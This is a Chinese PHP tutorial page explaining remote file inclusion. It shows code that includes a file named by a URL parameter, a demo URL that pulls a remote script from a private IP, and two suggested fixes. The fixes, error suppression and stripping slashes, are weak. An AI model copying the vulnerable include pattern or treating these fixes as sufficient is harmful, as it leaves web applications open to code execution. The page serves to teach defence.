脚本之家 服务器常用软件
快捷导航
您的位置:首页网络编程PHP编程php技巧 → PHP 远程文件包含漏洞

PHP 网络开发详解之远程文件包含漏洞

 更新时间:2010年04月25日 17:30:04   作者:  
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。
复制代码 代码如下:

<?php
$file_name = $_GET["filename"]; //获得当前文件名
include("$file_name "); //包含文件
//一些其他操作
?>

这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能。例如,通过在浏览器上访问http://localhost/test.php?filename=myinc.php就可以在代码(Code)中包含并执行myinc.php文件。
由于上面的代码(Code)没有进行任何错误处理,在浏览器上不加参数运行,所以将得到以下运行结果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
访问者通过读取这段错误信息,可以得知当前的操作是一个文件包含操作。这时,可以在自己的服务器上放置一个相应的脚本代码。需要注意的是PHP在获取远程文件时获得的是远程服务器的最终输出结果,而不是文件本身。该脚本代码位于192.168.0.1服务器上,文件名为hello.txt,脚本代码(Code)如下所示。
复制代码 代码如下:

<?php
echo "hello world!";
?>

这时,通过在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以运行hello.txt中的脚本了。
为了解决这个问题,一种方式是完善代码的错误信息,使访问者无法知道当前脚本正在包含参数中指定的文件。修改后的代码(Code)如下所示。
复制代码 代码如下:

<?php
$file_name = $_GET["filename"]; //获得当前文件名
if(!@include("$file_name.php")) //包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>

修改后,如果在被包含的文件无法找到时将出现“页面在浏览过程中出现错误”的错误信息,访问者将无法获得当前页面的具体操作信息。
第二种方式可以更加有效地防止远程文件包含攻击。方式是替换地址栏参数中的斜线“/”。这样,在地址栏参数中输入远程文件地址时,代码将无法正确地获得参数。修改后的代码(Code)如下所示。
复制代码 代码如下:

<?php
$file_name = str_replace('/', '', $_GET["filename"]); //获得当前文件名
if(!@include("$file_name.php")) //包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>

这样,在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt 时,实际上PHP代码(Code)获得的包含文件名称是http:192.168.0.1bugstest6_test。页面将不会包含远程文件,并显示相应的错误信息。
您可能感兴趣的文章:

相关文章

  • PHP foreach遍历多维数组实现方式

    PHP foreach遍历多维数组实现方式

    这篇文章主要为大家详细介绍了PHP foreach遍历多维数组实现方式,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2016-11-11
  • php运行提示:Fatal error Allowed memory size内存不足的解决方法

    php运行提示:Fatal error Allowed memory size内存不足的解决方法

    这篇文章主要介绍了php运行提示:Fatal error Allowed memory size内存不足的解决方法,分别针对有服务器管理权限和没有服务器管理权限的情况分析解决方法,是非常实用的技巧,需要的朋友可以参考下
    2014-12-12
  • php中\r \r\n \t的区别示例介绍

    php中\r \r\n \t的区别示例介绍

    这篇文章主要介绍了php中\r \r\n \t的区别,需要的朋友可以参考下
    2014-02-02
  • PHP const定义常量及global定义全局常量实例解析

    PHP const定义常量及global定义全局常量实例解析

    这篇文章主要介绍了PHP const定义常量及global定义全局常量实例解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
    2020-05-05
  • PHP查询附近的人及其距离的实现方法

    PHP查询附近的人及其距离的实现方法

    这篇文章主要介绍了PHP查询附近的人及其距离的实现方法,涉及php数学运算的相关技巧,具有一定参考借鉴价值,需要的朋友可以参考下
    2016-05-05
  • 在mac OS上进行多个PHP版本之间切换的实现方法

    在mac OS上进行多个PHP版本之间切换的实现方法

    不同项目使用php版本可能不同,需要安装不同版本php,本文给大家介绍了在macOS上进行多个 PHP 版本之间切换的实现方法,文中有详细的代码示例供大家参考,需要的朋友可以参考下
    2023-10-10
  • php比较多维数组中值的大小排序实现代码

    php比较多维数组中值的大小排序实现代码

    php中根据数组的键(key)进行比较,排序,有很多内置函数可以轻松解决,如krsort(), ksort()等。如果是根据数组的值(value)进行比较就麻烦一些
    2012-09-09
  • php设计模式介绍之值对象模式

    php设计模式介绍之值对象模式

    在所有的最简单的程序中,大多数对象都有一个标识,一个重要的商业应用对象,例如一个Customer或者一个SKU,有一个或者更多的属性---id,name,email地址,这样可以把它从同一个类的其他实例区分开来。此外,对象有一个恒定的标识:它是贯穿于整个应用程序的一个唯一的标识,对于程序员来说,”customer A”在任何地方就是”customer A”,并且只要你的程序在持续运行时"customer A"仍然是"customer A"。 但是一个对象不需要有一个标识。有些对象仅仅是为了描述其他对象的属性。
    2008-04-04
  • PHP对象、模式与实践之高级特性分析

    PHP对象、模式与实践之高级特性分析

    这篇文章主要介绍了PHP对象、模式与实践之高级特性,结合实例形式分析了php面向对象程序设计中的静态属性和方法、抽象类、接口、拦截器、克隆对象等概念与简单实现方法,需要的朋友可以参考下
    2016-12-12
  • PHP7.1实现的AES与RSA加密操作示例

    PHP7.1实现的AES与RSA加密操作示例

    这篇文章主要介绍了PHP7.1实现的AES与RSA加密操作,结合实例形式分析了php7.1环境下AES与RSA加密、解密操作相关实现与使用技巧,需要的朋友可以参考下
    2018-06-06

最新评论